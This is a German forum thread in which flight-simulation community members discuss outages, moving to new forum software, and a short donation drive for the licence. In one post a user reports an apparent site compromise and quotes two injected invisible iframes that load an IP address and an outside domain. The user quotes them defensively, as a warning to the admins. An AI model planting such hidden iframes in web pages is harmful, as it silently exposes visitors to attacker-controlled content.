Verfügbarkeitsprobleme Forum

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Original von s.schreck
      Die Lizenz kostet 150€, die werde ich (irgendwann) schon irgendwie zusammenbekommen. :)
      LG Sascha


      Wenn es an der Lizenz liegt, könnte man doch sicher eine kleine Spendeaktion starten. Gibt sicher ein paar User die dass unterstützen würden, am Schluss profitieren wir ja alle davon.

      Wenn DCS 2.0 auf sich warten lässt, können wir uns wenigstens über ein neues Forum freuen.
    • Ok, PW ändern sollte ich eh mal wieder.

      Ich würde ebenfalls ein paar Euro spenden wenn das hilft, eines meiner Lieblingsforen modern zu halten.
      Allerdings bin ich auch ein Fan von OpenSource, und die Frage ist, ob nicht eine aktuelle Version von phpBB für ein Forum wie unseres reicht. Wenn man die aktuell hält ist sie IIRC (arbeite nicht oft mit Forensoftware) auch relativ sicher.

      Gruß
      Aginor
      Freedom is just another word for nothing left to lose.
    • Naja, wir möchten dieses Forum sowie unser allgemeines Flugsimulations-Forum miteinander verbinden, sodass man mit einem Account beide Foren benutzen kann. Da ich jetzt nicht der absolute Profi in IT bin, der sich so eine Bridge selbst schreiben kann, muss ich auf fertige Plugins setzen. Plugins für diesen Zweck gibt es aber nur für XenForo. Außerdem sieht das xenForo von der Optik her um Welten besser und moderner aus, als zum Beispiel phpBB.
    • Also ich habe mal einen Spenden-Button in den Footer eingefügt, über den ihr per PayPal spenden könnt. Das geht auf das Paypal-Konto "redaktion()flusinews.de" da es bisher das einzige Paypal-Konto ist, das ich habe. Aber ich werde alle als "Lockonforum.de" gekennzeichneten Spenden-Gelder ausschließlich für das Lockonforum.de verwenden.

      Zielbetrag: 150€ - Wenn's den ein oder anderen Euro mehr einbringt wäre ich auch nicht böse, da mich das in den laufenden Betriebskosten etwas entlastet :D

      Bitte beachtet, dass pro Transaktion Paypal-Gebühren von 1,2% + 0,35€ für mich anfallen. Also wenn ihr beispielsweise 10€ spenden wollt, sollten es 10,48€ sein, andernfalls kommen effektiv nur 9,53€ an. Bitte mich nicht als Pfennigfuchser verstehen, ich dachte nur, vielleicht ist es für den ein oder anderen ja interessant, wie das alles so funktioniert :)

      Natürlich freue mich über jeden einzelnen Euro, und wäre positiv überrascht, wenn tatsächlich was kommen sollte. Bisher kann ich mir das noch gar nicht so recht vorstellen :D

      LG Sascha
    • Ich kann dich schon verstehen Viper, klar. Du hast all die Jahre das Forum so finanziert/betrieben, ohne um etwas gebeten zu haben. Und das ist klasse und dafür sind wir dir alle sehr dankbar. :c411:

      Trotzdem kann keine Rede davon sein, dass das Lockon-Forum jetzt durch Spenden finanziert werden soll. Konkret wollen wir eine neue Forensoftware anschaffen, da diese hier leider wirklich reichlich antiquiert ist, das fängt ja schon damit an, dass der Spamfilter komplett wirklos ist.

      Und wenn einige Nutzer hier ein paar Groschen über haben und von sich selbst anbieten, etwas beizusteuern (wohlgemerkt, wir selbst hatten die Idee ja nicht, es kam ja von Board-Usern, die Unterstützung angeboten haben), dann sagen wir natürlich auch nicht nein.

      Sascha hat geschrieben, der Zielbetrag sind 150€, dann ist die Lizenz abgedeckt. Wenn es weniger werden, zahlen wir den Rest selbst, gar keine Frage. Und danach wird der Button auch wieder abgeschafft, denn die laufenden Betriebskosten übernehmen wir gerne und es ist auch nicht so, dass dies jemanden in ein finanzielles Risiko stürzen würde.

      Da gibt es in der Szenerie ganz andere Foren, in denen regelmäßig von den Betreibern zu Aktionen aufgerufen wird - das jedoch haben wir nie getan.


      Viele Grüße
      Frank
    • Finde daran auch nichts schlimmes, im Gegenteil, zeigt doch nur das große Interesse der Member. :p112:

      ...und mal ehrlich die Forensoftware ist wirklich so dermaßen antiquiert,...Oje. Ein moderneres Gewand ist nicht nur technisch schon lange fällig.
      Ich wollte ja nie was sagen und mit der Qualität im Forum hat das ja auch nichts zu tun, aber wenn es denn gerade zur Sprache kommt. :D
      Varus! Oh Quinctilius Varus....gib mir meine Legionen zurück! :cursing:
    • Richtig, Ziel ist es keinesfalls, das Forum künftig durch Spenden zu finanzieren. Es ist eine größere Investition fällig, daher bin ich natürlich froh, wenn ich da ein bisschen unter die Arme gegriffen bekomme. Den Button habe ich ja erst dann eingefügt, als sich gestern mehrere User von sich selbst aus dafür ausgesprochen hatte. Ich will mich damit nicht bereichern und keiner soll durch die Spende ein besserer User sein als welche, die nicht gespendet haben. Wegen dem Dankbarkeits Thread denke ich aber, dass es ok ist, denen, die etwas gesendet haben, auch öffentlich Danke zu sagen.

      LG Sascha
    • Moin,

      ich glaube da wurde schon wieder Code in die Webseite eingeschleust.

      Quellcode

      1. <iframe src="http://128.199.129.106/includes/" style="opacity: 0" height="0" width="0">
      2. </iframe> <iframe src="https://ioscoderz.com/forum/" style="opacity: 0;" height="0" width="0"></iframe>


      Ach ja, wenn ihr das neue Forum aufzieht, dann bitte auch gleich das Hosting Paket oder den Hoster wechseln.
      Dann habt ihr hoffentlich gleich eine aktuelle Installationsbasis.

      Ein kleiner Tipp am Rande:
      Spätestes alle zwei Jahre das Hosting Paket ändern um auf einen aktuelleren und hoffentlich sicheren Softwarebasis zu kommen.

      CU Micha
    • Hallo!

      Mittlerweile sind ausreichend Mittel eingetroffen, sodass ich den PayPal-Button wie geplant wieder entfernt habe. Ich kann nun die Lizenz kaufen und werde das in den nächsten Tagen tun. Anschließend werde ich die neue Foren-Software an einem möglichst sicheren Ort installieren und Alle Themen, Beiträge und Benutzerkonten portieren. Das könnte etwas kompliziert werden, da ich über einige Umwege gehen muss. Dementsprechend kann es sein, dass es bis zu zwei Wochen dauert, ehe sich hier sichtlich was tut. Vielleicht nehme ich mir auch einfach die Zeit die ich brauche, um das neue Lockonforum perfekt zu machen. In Sachen Funktionaliät UND Sicherheit.

      Viele Grüße,

      Sascha